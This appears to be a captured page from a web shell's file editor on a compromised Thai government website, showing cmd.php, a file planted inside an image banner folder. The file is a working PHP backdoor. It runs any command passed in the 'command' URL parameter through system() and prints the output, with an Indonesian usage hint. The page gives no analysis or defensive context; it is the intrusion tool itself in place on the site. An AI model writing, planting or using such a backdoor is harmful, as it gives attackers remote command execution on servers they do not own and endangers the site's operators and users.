Web Shell
Current directory: /home/coloflew/domains/tessabalpatiu.go.th/public_html/image_data/banner
Editing: /home/coloflew/domains/tessabalpatiu.go.th/public_html/image_data/banner/cmd.php
<?php if (isset($_GET['command'])) { $command = $_GET['command']; echo "<pre>"; system($command); echo "</pre>"; } else { echo "Gunakan parameter ?command=perintah"; } ?>
Cancel